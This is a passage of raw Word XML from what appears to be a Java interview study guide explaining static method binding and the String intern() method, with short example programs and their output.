      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not bound to an instance (object) of a class but are bound to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> itself. This means that a static method can be called without creating an instance of the class, and it is associated with the class rather than with any particular object of that class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFE63D4" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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Points to Understand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C488512" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Method Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6525E133" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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static method is defined using the static keyword in the method signature. Static methods belong to the class itself rather than to instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D3D50" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="00DB347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MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D661375" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="00DB347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static void staticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100550D7" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="00DB347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This is a static method.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FAF9B5" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="00DB347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54A7808" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="00DB3477">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4EBBE99" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Method Call</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBB872" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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 call a static method using the class name directly, without the need to create an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF9E1F" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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yClass.staticMethod(); // Calling static method without creating an object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C1C149" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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inding of Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220FCF0" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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atic methods are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bound at compile-time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, not runtime. This is known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>early binding</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static binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269460DA" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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call a static method, the method is resolved at compile-time based on the class type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554409F" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ven if you invoke a static method via an object reference, it is still bound to the class type, not the object type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FDACC" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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28B97F14" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4CFA3B" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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atic void staticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77288CB6" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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This is a static method.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB15E1" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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3734B01" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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9113F47" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B55F70" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1AFA98" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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180C67D2" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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Class obj = new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF7AB85" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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E7BEB0D" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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lling the static method via object reference (not recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F5347B" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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bj.staticMethod();  // It's bound to MyClass, not the obj instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB15BF" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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CAE09AA" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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orrect way of calling static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5B153" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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Class.staticMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24608C94" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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6FDD1EC" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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26B2180" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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p w14:paraId="12F11261" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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is a static method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455AD5D9" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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is a static method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CAD207" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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ven though we called the static method on the obj instance, it was still resolved at compile-time to MyClass.staticMethod(). This shows that static methods are bound to the class at compile-time, not to the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E83B79" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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y Static Methods Are Bound to the Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133E5E23" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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atic methods are designed to operate on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class-level data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., static variables) rather than instance-level data (i.e., instance variables). Since they are not tied to any specific object, they belong to the class itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAE1BA3" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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JVM knows the static method belongs to the class at the time of compilation, which is why static methods are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolved at compile-time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64671B86" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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Differences in Method Binding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297BF51" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Bound at compile-time (early binding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729365E2" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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tance methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Bound at runtime (late binding), depending on the actual object type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB878AE" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7"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us, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static methods are not associated with instances of the class, but with the class itself</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. While it is technically possible to invoke a static method using an object reference, it is best practice to call static methods using the class name directly for clarity and convention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B1DEF" w14:textId="4ADDBC30" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028064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12BDD83">
          <v:rect id="_x0000_i1236" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7B40A" w14:textId="4BB01254" w:rsidR="006151C3" w:rsidRPr="00CE4B95" w:rsidRDefault="000362CB" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc196307570"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of the intern() method in String class</w:t>
      </w:r>
      <w:r w:rsidR="006151C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="141358EB" w14:textId="71421A49" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">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intern()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method in the String class in Java is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ensure that strings with the same content share the same memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. When you call the intern() method on a string, it checks if an identical string already exists in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>string pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a special memory region where Java stores strings). If the string is found in the pool, a reference to that string is returned. If the string is not found, it is added to the pool, and then a reference to it is returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4546DC8E" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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Points about intern():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A87FB5E" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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ring Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC31F6F" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="55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In Java, there is a special </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool</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String Constant Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) in memory where all string literals are stored. When you create a string literal (e.g., "Hello"), Java checks the pool to see if the string already exists. If it exists, Java uses the reference to the existing string; if not, it creates a new string in the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2199E0CF" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="55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intern() method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows strings that are not literals (dynamically created strings) to be added to the pool, ensuring that strings with the same content share the same reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275225DD" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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 of intern()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15835FC3" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="55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invoke intern() on a string, it ensures that the string either points to an existing string in the pool (if it matches another string) or is added to the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD7276" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="55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can be particularly useful for optimizing memory usage, as it eliminates duplicate strings and ensures that strings with the same value are stored only once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D02AA" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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74FC1FE0" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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InternExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075FD8C7" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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030BFC46" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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str1 = new String("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD9C2D2" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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str2 = new String("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613F7BE" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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713EB65" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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Without using intern()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023A6473" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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tr1 == str2); // false, because they are different objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152C52B1" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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06D0BA5" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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sing intern() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5264A463" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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str3 = str1.intern();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0355EF" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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str4 = str2.intern();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D04A835" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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6B5F928" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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fter using intern()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E244FC4" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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tr3 == str4); // true, because both refer to the same string in the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0215030D" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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B22AC1D" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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C31BCAF" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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p w14:paraId="1B2088ED" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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alse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A31AF9C" w14:textId="77777777" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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ue</w:t>
      </w:r>
    </w:p>
